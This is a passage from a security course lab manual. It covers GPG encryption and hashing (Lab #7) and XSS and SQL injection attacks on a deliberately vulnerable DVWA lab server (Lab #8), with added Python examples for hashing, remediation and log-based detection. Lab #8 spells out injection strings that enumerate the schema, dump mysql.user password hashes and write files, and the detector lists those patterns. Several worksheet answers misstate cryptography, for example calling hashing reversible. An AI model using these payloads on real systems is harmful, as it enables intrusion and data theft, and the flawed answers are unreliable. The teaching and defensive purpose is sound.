   TFTP (Tftpd32 TFTP Server)
   o Port: 69
   o Username:
   o Password:
7. GPG should already be pre-installed and located on the desktop of the Instructor VM workstation and the TargetWindows01 VM server.
   Note: If GPG is not on your desktop, look inside your \vlabs folder on the c:\ drive for the GPG install file. Install the GPG application with all the default installation configuration values.
8. Click on the GPG desktop icon to create your private key (Screen #1)
9. When asked for a name, enter Student, and click Forward
10. To create a unique private key, enter your individual e-mail address (e.g., student01@vlabsolutions.com) and click Forward
11. Create a backup copy of your new key when prompted and click Forward
12. Enter a passphrase to further encrypt your newly created key (this is your secret key). Write down this passphrase, as it will be needed to decrypt and encrypt messages
13. After generation of your key, save it to the desktop for quick access
14. Click on Close and open GPG again. Highlight the key you just created, click on the Export option, and name the key StudentVM as appropriate
15. Repeat Steps #10 - #14 to create a public key for the TargetWindows01 VM.
16. Click on the TargetWinVM01 key, click on the Export option, and name the key TargetVM01
17. Transfer both sets of keys to each of the VMs by copying, cutting, and pasting, or use an external USB hard drive, to ensure the public keys are transferred to both the Student VM and the TargetWindows01 VM server
18. Use the GPG Import button to import the public keys on both VMs
19. On the Student VM, right-click the newly imported key, click on the Set Owner Trust option, and set it to Full in the options selection
20. On the Student VM, right-click the newly imported key, click on the Sign Keys option, and enter the secret key passphrase from the earlier generation to sign the public key into your secret key ring as authorized
21. For hashing, we can verify the public key was imported correctly into both the Student VM workstation and the TargetWindows01 VM server. Integrity is maintained if the hash value matches the Fingerprint in the GPG home window
22. On the Student VM, create a new file on the desktop using Notepad, name the file IT255 Lab #7.txt, and add the message "I like information systems security" in the text file
23. Save the IT255 Lab #7.txt file, right-click it, and choose the Sign and Encrypt option. Make sure you check the Remove Unencrypted File option at the bottom (refer to Screen #3)
24. Add both certificates (keys) to the Options and click Encrypt! (refer to Screen #4)
25. Once encrypted, you will see the encrypted file replace the plain text file on the desktop; right-click it and choose the Decrypt/Verify option (refer to Screen #5)
26. Now transfer the encrypted file to the TargetWindows01 VM server desktop and perform steps similar to Steps #22 - #25 to decrypt (not encrypt) the file just received on the TargetWindows01 VM server

Deliverables

Upon completion of this lab, students are required to provide the following deliverables:

1. Lab #7 Your original GPG encrypted message and decrypted message
2. Lab #7 Your hash value for the hashed file
3. Lab #7 Lab Assessment Questions & Answers

Evaluation Criteria and Rubrics

The following are the evaluation criteria and rubrics for Lab #7: Relate Windows Encryption and Hashing to Confidentiality & Integrity:

1. Was the student able to apply the concepts of using common cryptographic and encryption techniques to ensure confidentiality? [20%]
2. Was the student able to apply the concepts of hashing to ensure integrity of data transmission and data reception? [20%]
3. Was the student able to identify the output of common cryptographic and hashing tools on transmitted data and verify confidentiality and integrity? [20%]
4. Was the student able to implement an MD5 sum or SHA1 hash on a data transmission or message to verify data transmission integrity? [20%]
5. Was the student able to implement GPG for Windows to encrypt a data message to ensure confidentiality? [20%]
Lab #7 Assessment Worksheet
Relate Windows Encryption and Hashing to Confidentiality & Integrity

Course Name & Number: ______________________
Student Name: ______________________
Instructor Name: ______________________
LAB Due Date: ______________________

Overview

This lab demonstrates how hashing tools can be used to ensure message and file transfer integrity and how encryption can be used to maximize confidentiality. Common hashing and encryption tools including MD5, SHA1, and GnuPG will be used. The students will engage in hashing exercises to demonstrate message and file integrity using both MD5 and SHA1 on their Student VM and TargetWindows01 VM server desktop. They will execute the MD5 and SHA1 hashing tools on their Student VM desktop on a sample file, comparing the hash value when the sample file is modified or altered. They will then load GnuPG to generate both a public and private key and a secret key for encryption only. The students will share public keys and the secret keys in order to send secure messages and files from the Student VM to the TargetWindows01 VM server.

LAB Assessment Questions & Answers

1. Which key do you provide to anyone you want to encrypt messages with: private or public keys, or both?

Public key only should be needed. Your private key is encrypted but should still never be given away.

2. What does GPG allow you to do once it is installed?

GPG allows you to encrypt messages, files, and text using a private key that allows trusted users to decrypt if you give them your public key.

3. Name 2 different types of encryption supported by GPG for your key.

DSA and RSA, with varying key sizes up to 4096 bits.

4. What happens when you sign and trust a new key in your keychain?

You are able to decrypt messages for the user's key you imported and signed as trusted.

5. If a user sends you his public key, will he be able to decrypt your encrypted messages once you import and sign his key?

No, you must provide your public key to any user wanting to decrypt any message encrypted by you.

6. What are the similarities between an MD5 hash and a fingerprint?

Both use a mathematical function that converts a file into a smaller unique datum that can be checked for integrity.

7. How would you encrypt a webserver and the pages it serves up?

Using SSL certificates, so that clients can log in, view the certificate, and trust it to encrypt the transmissions.

8. Why is hashing all database inputs not considered encryption of the database? What value does hashing database entries provide from server to client?

Hashing is a unique mathematical equation done in case integrity is called into question. This equation can be reversed if the correct algorithm is used. Encryption will not allow any possible solution without the public or private key knowledge or information; GPG is an example of encryption. Hashing verifies the integrity of the data when received at the destination.

9. Where would you remove a user's certificate from being able to access systems on your network?

You would revoke the certificate for the user in the CRL (Certificate Revocation List), which would pull from the CA (Certificate Authority).

10. Which connection type is secure and which is clear text between SSH, Telnet, and FTP?

SSH uses public keys and is the only one of the 3 listed which encrypts the communications.
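The hashing exercise from the Lab #7 hands-on steps (hash a sample file, alter it, hash it again) and the receiver-side integrity check behind worksheet questions 6 and 8, carried out in code. This is an added example, not part of the lab manual: the file contents are the lab's own message, the altered copy and the check function are constructed here.

```python
# Added example (not from the lab manual): the Lab #7 hashing exercise.
# A sample file is hashed with MD5 and SHA1, altered by one character, and
# re-hashed; the receiver's integrity check then detects the change.
import hashlib
import hmac
from typing import Dict

# Constructed sample data: the message the lab has students type into
# "IT255 Lab #7.txt", and an altered copy differing in a single character.
ORIGINAL_MESSAGE = b"I like information systems security"
ALTERED_MESSAGE = b"I like information systems securitY"


def digests(data: bytes) -> Dict[str, str]:
    """Return the MD5 and SHA1 hex digests of data, as the lab's tools print them."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
    }


def hex_chars_changed(a: str, b: str) -> int:
    """Count differing hex characters between two equal-length digests.

    A one-character change in the input scrambles most of the digest
    (the avalanche effect), which is why a hash mismatch is unambiguous."""
    if len(a) != len(b):
        raise ValueError("digests must have the same length")
    return sum(1 for x, y in zip(a, b) if x != y)


def verify_integrity(received: bytes, expected: Dict[str, str]) -> bool:
    """Receiver-side check: recompute both digests over the received bytes
    and compare each with the digest obtained out of band (for example read
    off the sender's screen, as the lab does with the GPG fingerprint).
    hmac.compare_digest avoids leaking timing during the comparison."""
    actual = digests(received)
    return all(
        hmac.compare_digest(actual[name], expected[name])
        for name in ("md5", "sha1")
    )


def demo() -> Dict[str, object]:
    """Walk through the lab: hash the file, modify it, re-hash, compare."""
    before = digests(ORIGINAL_MESSAGE)
    after = digests(ALTERED_MESSAGE)
    return {
        "before": before,
        "after": after,
        "md5_chars_changed": hex_chars_changed(before["md5"], after["md5"]),
        "sha1_chars_changed": hex_chars_changed(before["sha1"], after["sha1"]),
        # The sender published the digests of the original file; the
        # original passes the check, the altered copy does not.
        "original_verifies": verify_integrity(ORIGINAL_MESSAGE, before),
        "altered_verifies": verify_integrity(ALTERED_MESSAGE, before),
    }


if __name__ == "__main__":
    result = demo()
    print("original:", result["before"])
    print("altered: ", result["after"])
    print("MD5 hex chars changed: ", result["md5_chars_changed"], "of 32")
    print("SHA1 hex chars changed:", result["sha1_chars_changed"], "of 40")
    print("original passes integrity check:", result["original_verifies"])
    print("altered passes integrity check: ", result["altered_verifies"])
```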
Laboratory #8

Lab #8: Perform a Website & Database Attack by Exploiting Identified Vulnerabilities

Learning Objectives and Outcomes

Upon completing this lab, students will be able to complete the following tasks:
- Identify web application and web server backend database vulnerabilities as viable attack vectors
- Develop an attack plan to compromise and exploit a web site using cross-site scripting (XSS) against sample vulnerable web applications
- Conduct a manual Cross-site Scripting (XSS) attack against sample vulnerable web applications
- Perform SQL injection attacks against sample vulnerable web applications with e-commerce data entry fields
- Mitigate known web application and web server vulnerabilities with security countermeasures to eliminate risk from compromise and exploitation

Required Setup and Tools

This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 2 switch. This will allow a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations.

The following is required for this hands-on lab:

A) NOT NEEDED - A classroom workstation/server (with at least 4 GB RAM) capable of supporting the removable hard drive with the VM server farm.
B) An instructor workstation/server (with at least 2 GB RAM; 4 GB RAM recommended) that shall act as the Instructor's test bed for performing the demo lab. The instructor will power on the WindowsDHCP01 VM server, the TargetUbuntu01 Linux VM server, and the Instructor VM workstation using VMware Player.
C) Students' lab workstations will use their own VM server farm and VM student workstation. VMware Player will be used to run the Student VM and the Target VM.
The following summarizes the setup, configuration, and equipment needed to perform Lab #8:

1. A Virtualized Server Farm with:
   a. Microsoft DHCP server for allocating student IP host addresses
   b. Instructor VM workstation
2. Target VMs as described by the Lab:
   Ubuntu Linux 10.04 LTS Server (VM Name: TargetUbuntu01)
   o Computer Name: Ubuntu01
   o ONE User available ONLY: administrator
   o Password: ISS316Security (case sensitive)
   o IP Address: eth0 set to DHCP, eth1 and eth2 not set.
   SSH
   o Port: 21
   o Username: administrator
   o Password:
   Apache running Damn Vulnerable Web App (DVWA)
   o URL: http:///dvwa
   o Username: admin
   o Password: password
3. Standard ITT ISS onsite student workstation must have the following software applications loaded to perform this lab:
   a. VMware Player
   b. Web Browser (Internet Explorer)
   c. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers

Recommended Procedures

Instructor Demo Lab #8:

The instructor will perform a demonstration of an XSS exploit and an SQL injection attack on the TargetUbuntu01 Linux VM server running the Damn Vulnerable Web App (DVWA) on an Apache web server. The instructor VM workstation and student VM workstations should be connected to the same layer 2 switch for DHCP purposes, so that students do not have to enable their local DHCP server given memory constraints. The instructor will enable the TargetUbuntu01 Linux VM server. The instructor will demonstrate how to perform a Cross-site Scripting attack and an SQL injection attack on the DVWA web server, which acts as the test bed for the attack strings and commands entered by the penetration tester. Mitigation solutions will be identified for the software vulnerabilities that were exploited.
Hands-on Lab #8 Instructor Steps:

The instructor will perform the following demonstration using VMware Player:
1. Connect the Instructor removable hard drive to the dedicated Instructor workstation.
2. Power up and log into your Instructor VM, TargetUbuntu01 VM, and the Microsoft Windows DHCP Server VM to obtain an IP address.
   Note: Remember that if you only have 2 GB RAM, you may have to turn on your VMs one at a time to maximize performance. Once you, the students, and the TargetUbuntu01 Linux VM servers have obtained an IP address, you can power off the WindowsDHCP01 Server VM. Now perform the web application and web server attacks on the TargetUbuntu01 Linux VM server using the Instructor VM workstation.
3. Connect the LCD projector to the Instructor workstation and project onto the screen for students to view your demo.
4. Log into the TargetUbuntu01 Linux VM server and verify that it has received an IP address by typing:
   $ sudo ifconfig -a
5. If it has an IP host address, connect to it using your Instructor VM workstation's Internet Explorer browser: http://<targetubuntu01 IP host>/dvwa
6. If it has not obtained an IP address, verify which eth interface is being detected by the VM (i.e., eth0, eth1, eth2, etc.). This information is provided in the ifconfig command's output.
7. To set a static IP, or to set a non-standard eth interface to DHCP, on Ubuntu follow these steps:
   a. $ sudo nano /etc/network/interfaces
   b. Once the nano editor comes up, enter the following entry for your particular eth interface (insert the eth# that is displayed as enabled on your VM; it may not be eth0, eth1, eth2, etc.):
      i.
         auto lo eth0
         iface lo inet loopback
         iface eth0 inet static
             address 172.30.0.xxx      (xxx = your static IP host address)
             netmask 255.255.255.0     (enter the /24 netmask)
             gateway 172.30.0.1        (enter the default gateway IP here)
   c. For DHCP enter the following:
      i.
         auto lo eth0
         iface lo inet loopback
         iface eth0 inet dhcp
      (The method keyword is dhcp; "dynamic" is not a valid method in /etc/network/interfaces and networking would fail to restart with it.)
   d. Save and exit by hitting CTRL+X on the keyboard and Y to save the file.
   e. Type the following to restart networking:
      $ sudo /etc/init.d/networking restart

To Exploit a Cross-site Scripting (XSS) Vulnerability in DVWA, perform the following:
1. Exploit a cross-site scripting vulnerability to cause a message to appear on a user's screen.
2. Provide a screenshot or description of the attack.
3. With TargetUbuntu01 enabled, open your Internet Explorer browser and connect to the web site http://172.30.0.x/dvwa, where x is the IP host address allocated by the DHCP server.
   o URL: http:///dvwa
   o Username: admin
   o Password: password
4. Once the web page comes up, log in, click on the DVWA Security tab, and set it to low.
5. Click on the XSS Reflective tab, which displays the vulnerable web application used to test reflected cross-site scripting against the web site.
6. Try to insert in the provided input box the following: See the output there. This indeed shows that we can further send scripts through the validation box provided.
7. Reflective XSS, when enabled in the application, can create alerts and pop-ups. To further test the XSS vulnerability, insert the following: alert(vuln); Hello!

To Exploit an SQL Injection Vulnerability in DVWA, perform the following:
1. Exploit an SQL injection vulnerability by injecting SQL commands into the application's data entry fields, and provide a screenshot or output of the attack.
2. Power up the TargetUbuntu01 Linux VM server and, using your Instructor workstation's Internet Explorer, open the web site as follows: http://172.30.0.x/dvwa, where x is the IP host address that was assigned to the TargetUbuntu01 Linux VM server.
3. Once the DVWA page comes up, log in, click on the DVWA Security tab, and set it to low.
4. Click on the SQL Injection tab, which provides a vulnerable web app to test SQL injections against the back-end database.
5. Enter O'Malley, as we want to see whether the field populates and whether any anomalies or errors appear. Did any character get recognized before our error?
6. We see from here that we can interrupt the query and possibly extract debug information using a different SQL injection. Let's try actually passing an SQL statement. Try: a' OR 'x'='x';#
7. This is a familiar statement, similar to the infamous: a OR 1&1 #
8. Several other combinations should also work, so let's try some.
   NOTE: These strings are in clear text. You should check your web server logs, specifically for DECLARE statements, to know whether or not databases are being injected; you can verify from these logs if the database has been injected. Obfuscation using hexadecimal character strings is also commonly used.
9. DB enumeration: a' ORDER BY 1;# is not too different and should show the login screen, showing that it recognized the command. Try 2, then 3, and notice the difference between all three: 3 is not recognized as a value, and the error relates to columns. Now we know we can start using UNION statements.
10. Try: a' OR firstname IS NULL;#  Do you see the error?
11. Now try: a' OR first_name IS NULL;#  Do you see the difference? The screen came back just like with our ORDER BY statement earlier.
12. Try: a' OR database() LIKE 'DB';#  This command searches for a possible hit on the DB's characters. Adding a % splits different fields to query.
13. Try: a' OR database() LIKE 'd%';#  Notice the output?
14. Try: a' UNION SELECT table_schema, table_name FROM information_Schema.tables;#  Results in all table and column names being returned.
15. Try: a' UNION ALL SELECT 1, @@version;#  That will give you some information on the version of the SQL server.
16. Try: a' UNION ALL SELECT system_user(),user();#  This will tell you the user you are making queries under from the web app.
17. Try: a' UNION ALL SELECT user, password FROM mysql.user;# priv;#'  At this point you have a hash for a user to the backend DB.
18. We will check for injection at this time by issuing: 'UNION SELECT 'test', '123' INTO OUTFILE 'testing1.txt  At this point we know we have a user, and we know the DB can be written to. We have users, user IDs, table and column information, and an injectable database.

Hands-on Lab #8 Student Steps:

Students should perform the following steps:
1. Connect your removable hard drive to your ITT student workstation and log on using GUEST credentials.
   Note: Wait for the instructor to disconnect the classroom workstations from the ITT internal network and live Internet prior to booting up your student VM workstation to obtain an IP host address from the DHCP server.
2. Using VMware Player, power up your student VM workstation and obtain an IP host address from the WindowsDHCP01 server.
3. Using VMware Player, power up your TargetUbuntu01 Linux VM server and obtain an IP host address from the WindowsDHCP01 server.
   Note: If you only have 2 GB RAM, you may want to put static IP address configurations in your Student VM workstation and TargetUbuntu01 Linux VM server so you don't have to power on the WindowsDHCP01 VM server.
   Once you have valid IP host addresses and can ping each other (Student VM and TargetUbuntu01 Linux VM), you can perform the web application and web server attacks on the TargetUbuntu01 Linux VM server.
4. Log into the TargetUbuntu01 Linux VM server and verify that it has received an IP address by typing:
   $ sudo ifconfig -a
5. If it has an IP host address, connect to it using your Instructor VM workstation's Internet Explorer browser: http://<targetubuntu01 IP host>/dvwa
6. If it does not have an IP address, first verify which eth interface is being detected by the VM (i.e., eth0, eth1, eth2, etc.). This information is provided in the ifconfig command's output.
7. To set a static IP, or to set a non-standard eth interface to DHCP, on Ubuntu follow these steps:
   a. $ sudo nano /etc/network/interfaces
   b. Once the nano editor comes up, enter the following entry for your particular eth interface (insert the eth# that is displayed as enabled on your VM; it may not be eth0, eth1, eth2, etc.):
      i.
         auto lo eth0
         iface lo inet loopback
         iface eth0 inet static
             address 172.30.0.xxx      (xxx = your static IP host address)
             netmask 255.255.255.0     (enter the /24 netmask)
             gateway 172.30.0.1        (enter the default gateway IP here)
   c. For DHCP enter the following:
      i.
         auto lo eth0
         iface lo inet loopback
         iface eth0 inet dhcp
      (The method keyword is dhcp; "dynamic" is not a valid method in /etc/network/interfaces and networking would fail to restart with it.)
   d. Save and exit by hitting CTRL+X on the keyboard and Y to save the file.
   e. Type the following to restart networking:
      $ sudo /etc/init.d/networking restart

To Exploit a Cross-site Scripting (XSS) Vulnerability in DVWA, perform the following:
1. Exploit a cross-site scripting vulnerability to cause a message to appear on a user's screen.
2. Provide a screenshot or description of the attack.
3. With TargetUbuntu01 enabled, open your Internet Explorer browser and connect to the web site http://172.30.0.x/dvwa, where x is the IP host address allocated by the DHCP server.
   o URL: http:///dvwa
   o Username: admin
   o Password: password
4. Once the web page comes up, log in, click on the DVWA Security tab, and set it to low.
5. Click on the XSS Reflective tab, which displays the vulnerable web application used to test reflected cross-site scripting against the web site.
6. Try to insert in the provided input box the following: See the output there. This indeed shows that we can further send scripts through the validation box provided.
7. Reflective XSS, when enabled in the application, can create alerts and pop-ups. To further test the XSS vulnerability, insert the following: alert(vuln); Hello!

To Exploit an SQL Injection Vulnerability in DVWA, perform the following:
1. Exploit an SQL injection vulnerability by injecting SQL commands into the application's data entry fields, and provide a screenshot or output of the attack.
2. Power up the TargetUbuntu01 Linux VM server and, using your Instructor workstation's Internet Explorer, open the web site as follows: http://172.30.0.x/dvwa, where x is the IP host address that was assigned by DHCP to the TargetUbuntu01 Linux VM server.
3. Once the web page comes up, log in, click on the DVWA Security tab, and set it to low. Then click on the SQL Injection tab, which provides the vulnerable web app used to test SQL injections against the back-end database.
4. Enter O'Malley, as we want to see whether the field populates any anomalies or errors. Did any character get recognized before our error?
5. We see from here that we can interrupt the query and possibly extract debug information from a different SQL injection. Let's try actually passing an SQL statement. Try: a' OR 'x'='x';#
6. This is a familiar statement, similar to the infamous: a OR 1&1 #
7. Several other combinations should also work, so let's try some.
   NOTE: These strings are in clear text. You should check your web server logs, specifically for DECLARE statements, to know whether or not databases are being injected, and from these logs check the databases for injected content. Obfuscation using hexadecimal character strings is also commonly used.
8. DB enumeration: a' ORDER BY 1;# is not too different and should show the login screen, showing that it recognized the command. Try 2, then 3, and notice the difference between all three: 3 is not recognized as a value, and the error relates to columns. Now we know we can start using UNION statements.
9. Try: a' OR firstname IS NULL;#  See the error? Now try: a' OR first_name IS NULL;#  See the difference? The screen came back just like with our ORDER BY statement earlier.
10. Try: a' OR database() LIKE 'DB';#  This command searches for a possible hit on the DB's characters. Adding a % splits different fields to query. Try: a' OR database() LIKE 'd%';#  Notice the output?
11. Try: a' UNION SELECT table_schema, table_name FROM information_Schema.tables;#  Results in all table and column names being returned.
12. Try: a' UNION ALL SELECT 1, @@version;#  That will give you some information on the version of the SQL server.
13. Try: a' UNION ALL SELECT system_user(),user();#  This will tell you the user you are making queries under from the web app.
14. Try: a' UNION ALL SELECT user, password FROM mysql.user;# priv;#'  At this point you have a hash for a user to the backend DB.
15. We will check for injection at this time by issuing: 'UNION SELECT 'test', '123' INTO OUTFILE 'testing1.txt  At this point we know we have a user, and we know the DB can be written to.
    We have users, user IDs, table and column information, and an injectable database.

Deliverables

Upon completion of Lab #8: Perform a Website & Database Attack by Exploiting Identified Vulnerabilities, students are required to provide the following deliverables:
1. Lab #8 Written Analysis of the Identified Vulnerabilities, Exploit, and Remediation Steps:
   a. A summary of findings, assessment, and recommendations report that includes:
      i. Enumeration: identification of the exploit
      ii. Compromise & Exploit:
         1. Screenshot or description of the cross-site scripting attack
         2. Screenshot or description of the SQL injection attack
      iii. Remediation
2. Lab #8 Assessment Worksheet Questions & Answers

Evaluation Criteria and Rubrics

The following are the evaluation criteria and rubrics for Lab #8 that the students must perform:
1. Identify web application and web server backend database vulnerabilities as viable attack vectors [20%]
2. Develop an attack plan to compromise and exploit a web site using cross-site scripting (XSS) against sample vulnerable web applications [20%]
3. Conduct a manual cross-site scripting (XSS) attack against sample vulnerable web applications [20%]
4. Perform SQL injection attacks against sample vulnerable web applications with e-commerce data entry fields [20%]
5. Mitigate known web application and web server vulnerabilities with security countermeasures to eliminate risk from compromise and exploitation [20%]
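The Remediation deliverable above asks for countermeasures against the two vulnerabilities exploited in this lab. The Python below is an added illustration, not part of the lab manual and not DVWA's own (PHP) code: it places the DVWA-style lookup built by string concatenation beside a parameterized version, and the reflected greeting echoed raw beside an HTML-escaped version, using a constructed in-memory SQLite table in place of DVWA's MySQL database.

```python
import html
import sqlite3

# Constructed stand-in for DVWA's MySQL "users" table (SQLite so the example runs
# offline). DVWA's SQLi page takes a user_id and echoes first and last name.
# A third countermeasure not shown in code: run the web app's DB account without
# the FILE privilege, so the INTO OUTFILE write probed in step 18 is refused.
_CONN = sqlite3.connect(":memory:")
_CONN.executescript(
    """
    CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT);
    INSERT INTO users VALUES ('1', 'admin', 'admin');
    INSERT INTO users VALUES ('2', 'Gordon', 'Brown');
    INSERT INTO users VALUES ('3', 'Hack', 'Me');
    INSERT INTO users VALUES ('4', 'Pablo', 'Picasso');
    INSERT INTO users VALUES ('5', 'Bob', 'Smith');
    """
)


def vulnerable_lookup(user_id: str) -> list[tuple[str, str]]:
    """The 'before' pattern: the request value is spliced into the SQL text, so a
    quote in the input changes the statement (this is the bug the lab exploits)."""
    query = (
        "SELECT first_name, last_name FROM users "
        f"WHERE user_id = '{user_id}'"
    )
    return _CONN.execute(query).fetchall()


def safe_lookup(user_id: str) -> list[tuple[str, str]]:
    """The remediation: a parameterized query. The input is bound as a value and
    can never become SQL syntax, whatever quotes or keywords it contains.
    (In PHP, PDO prepare()/bindValue() gives DVWA the same protection.)"""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return _CONN.execute(query, (user_id,)).fetchall()


def render_vulnerable(name: str) -> str:
    """Reflected XSS 'before': the name from the request is echoed into the page
    unchanged, so markup in the input becomes markup in the response."""
    return f"<pre>Hello {name}</pre>"


def render_safe(name: str) -> str:
    """Remediation: encode for the HTML context before echoing. quote=True also
    encodes quotes, which matters when the value lands inside an attribute."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


# Tautology string of the kind used in the lab. SQLite's comment marker is "--"
# (the lab's ";#" is MySQL's), so the trailing quote is commented out the same way.
TAUTOLOGY = "a' OR 'x'='x' --"
MARKUP = "<script>alert(1)</script>"

if __name__ == "__main__":
    print("vulnerable rows:", len(vulnerable_lookup(TAUTOLOGY)))  # every row leaks
    print("safe rows:      ", len(safe_lookup(TAUTOLOGY)))        # no such user_id
    print(render_vulnerable(MARKUP))
    print(render_safe(MARKUP))
```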
Lab #8 Assignment Worksheet

Perform a Website & Database Attack by Exploiting Identified Vulnerabilities

Course Name & Number: ______________________________________________________________
Student Name: _______________________________________________________________________
Instructor Name: _____________________________________________________________________
Lab Due Date: _______________________________________________________________________

Overview

Students must provide a Written Report of the Identified Vulnerabilities, Exploits, and Remediation Steps organized as follows:
A summary of findings, assessment, and recommendations report that includes:
   a. Enumeration: identify the exploit. What did you find?
   b. Compromise & Exploit: what were you able to do?
      i. Screenshot or description of the cross-site scripting attack. What did you compromise?
      ii. Screenshot or description of the SQL injection attack. What data did you extract?
   c. Remediation: what security countermeasures do you recommend to mitigate the risk from compromise and exploitation?
Lab #8 Assessment Worksheet

Perform a Website & Database Attack by Exploiting Identified Vulnerabilities

Course Name & Number: ______________________________________________________________
Student Name: _______________________________________________________________________
Instructor Name: _____________________________________________________________________
Lab Due Date: _______________________________________________________________________

Overview

The students will verify and perform a cross-site scripting (XSS) exploit and an SQL injection attack on the test bed web application and web server, using the Damn Vulnerable Web App (DVWA) loaded on an Apache web server on the TargetUbuntu01 Linux VM server. They will first identify the IP target host, identify known vulnerabilities and exploits, and then attack the web application and web server using XSS and an SQL injection to exploit the web application using a web browser and some simple command strings.

Lab Assessment Questions & Answers

1. Why is it critical to perform a penetration test on a web application prior to production implementation?
Testing and performing penetration tests on web applications and web servers is a critical step in ensuring the confidentiality, integrity, and availability of the web application and service. If e-commerce or privacy data is entered into the web application, the company is under compliance laws and standards to ensure the confidentiality of customer privacy data. Penetration testing should be performed whenever the web application and service is updated or modified.

2. What is a cross-site scripting attack? Explain in your own words.
The malicious insertion of scripting code to extract or modify a website, its application, and its contents.

3. What is a reflective cross-site scripting attack?
A reflective cross-site scripting attack is one in which all input shows output on the user's/attacker's screen, like remote control software.

4. What common method of obfuscation is used in most real-world SQL attacks?
Because SQL databases don't know the difference between a valid and secure database query and a malicious one, you can obfuscate an SQL database with a real SQL query command using hexadecimal encoding.

5. Which web application attack is more prone to extracting privacy data elements out of a database?
SQL injection attack. By inserting real SQL query commands, you may be able to extract privacy data elements from a web application front-end.

6. If you can monitor when SQL injections are performed on an SQL database, what would you recommend as a security countermeasure to monitor your production SQL databases?
Monitor your SQL databases for unauthorized or abnormal SQL injections and write scripts for alarming and SNMP network management alerts. Additional safeguards can include encrypting the data elements that reside in long-term storage of the SQL database.

7. Given that Apache and Internet Information Services (IIS) are the two most popular web application servers for Linux and Microsoft Windows platforms, what would you do to identify known software vulnerabilities and exploits?
Visit the CVE listing database and identify all known Apache and IIS software vulnerabilities and exploits. Using this information, you can cross-reference whether any of your production web applications are Apache or Internet Information Services (IIS). You can then perform a vulnerability assessment using Nessus as a scanning tool. Remediate any production web servers with software patches and security patches for identified critical and major software vulnerabilities.

8. What can you do to ensure that your organization incorporates penetration testing and web application testing as part of its implementation procedures?
Make a policy that dictates that no production web application can be implemented without proper penetration testing and security hardening. This is critical if your organization is under a compliance law and your web application requires inputting of customer privacy data.

9. What other security countermeasures do you recommend for web sites and web application deployment to ensure the C-I-A of the web application?
- HTTPS:// SSL 128-bit encryption
- Authentication
- Two-factor authentication
- Hashing
- VPNs
- Database back-ups
- Database encryption
- Placement of web server on DMZ
- Security countermeasures to prevent DoS/DDoS
- Periodic software vulnerability assessments
- Periodic penetration testing & remediation steps

10. Who is responsible and accountable for the C-I-A of production web applications and web servers?
Web application developers and software developers are responsible and accountable for secure coding and testing the application. Database developers and administrators are responsible and accountable for ensuring the data integrity and back-ups of the database are performed regularly. Network engineers and information systems security practitioners are responsible and accountable for ensuring the network, DMZ, and Internet connectivity is available and protected from DoS/DDoS and other malicious attacks.
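The NOTE in the SQL injection procedure and assessment questions 4 and 6 above call for checking web server logs for injection strings, including hex-obfuscated ones. The following Python script is an added example, not part of the lab manual or of DVWA: it runs a handful of detection rules keyed to the strings this lab walks through over constructed Apache access-log lines (not real captures), URL-decoding each query string and expanding 0x... literals so that a keyword hidden in hex trips the same rule as plain text.

```python
import re
from urllib.parse import unquote_plus

# Detection rules keyed to the strings walked through in this lab; matched
# case-insensitively against the URL-decoded (and hex-expanded) query string.
RULES = {
    "tautology":    r"'\s*or\s+'?[\w@]+'?\s*(=|like\b|is\s+null)",
    "union_select": r"\bunion\s+(all\s+)?select\b",
    "column_probe": r"\border\s+by\s+\d+",
    "schema_enum":  r"\binformation_schema\b|@@version|\bmysql\.user\b|"
                    r"\b(system_)?user\(\)|\bdatabase\(\)",
    "file_write":   r"\binto\s+(out|dump)file\b",
    "declare_exec": r"\bdeclare\b.*\b(exec|cast)\b",
    "hex_literal":  r"\b0x[0-9a-f]{8,}\b",
}
_COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}

# Apache common/combined log format: client ident user [timestamp] "request" status ...
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
_HEX_RE = re.compile(r"0x([0-9a-fA-F]{2,})\b")


def expand_hex(text: str) -> str:
    """Replace MySQL-style 0x... literals with their decoded characters so that
    hex-obfuscated keywords are matched by the same rules as plain text."""
    def _decode(m: re.Match) -> str:
        digits = m.group(1)
        if len(digits) % 2:          # odd length is not a byte string; leave it
            return m.group(0)
        return bytes.fromhex(digits).decode("latin-1")
    return _HEX_RE.sub(_decode, text)


def classify(raw_query: str) -> tuple[list[str], str]:
    """Return (sorted names of rules that fired, decoded query text)."""
    decoded = unquote_plus(raw_query)
    expanded = expand_hex(decoded)
    hits = {name for name, rx in _COMPILED.items()
            if rx.search(decoded) or rx.search(expanded)}
    return sorted(hits), expanded


def scan_log(lines: list[str]) -> list[dict]:
    """Walk access-log lines and return one finding per request that trips a rule."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        client, stamp, method, target, status = m.groups()
        query = target.partition("?")[2]
        if not query:
            continue
        rules, decoded = classify(query)
        if rules:
            findings.append({"client": client, "time": stamp, "status": status,
                             "rules": rules, "decoded": decoded})
    return findings


# Constructed sample lines (not real captures) mirroring the lab's DVWA requests.
# The last one hides its SELECT inside a hex literal behind a DECLARE/CAST/EXEC
# wrapper, the pattern the lab's NOTE tells you to look for.
_HEX_PAYLOAD = b"SELECT user,password FROM mysql.user".hex()
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Mar/2013:10:12:01 -0500] "GET /dvwa/vulnerabilities/sqli/'
    '?id=1&Submit=Submit HTTP/1.1" 200 1745',
    '10.0.0.5 - - [08/Mar/2013:10:12:30 -0500] "GET /dvwa/vulnerabilities/sqli/'
    '?id=a%27+OR+%27x%27%3D%27x%27%3B%23&Submit=Submit HTTP/1.1" 200 4211',
    '10.0.0.5 - - [08/Mar/2013:10:13:02 -0500] "GET /dvwa/vulnerabilities/sqli/'
    '?id=a%27+UNION+ALL+SELECT+1%2C+%40%40version%3B%23&Submit=Submit HTTP/1.1" 200 1900',
    '10.0.0.5 - - [08/Mar/2013:10:13:40 -0500] "GET /dvwa/vulnerabilities/sqli/'
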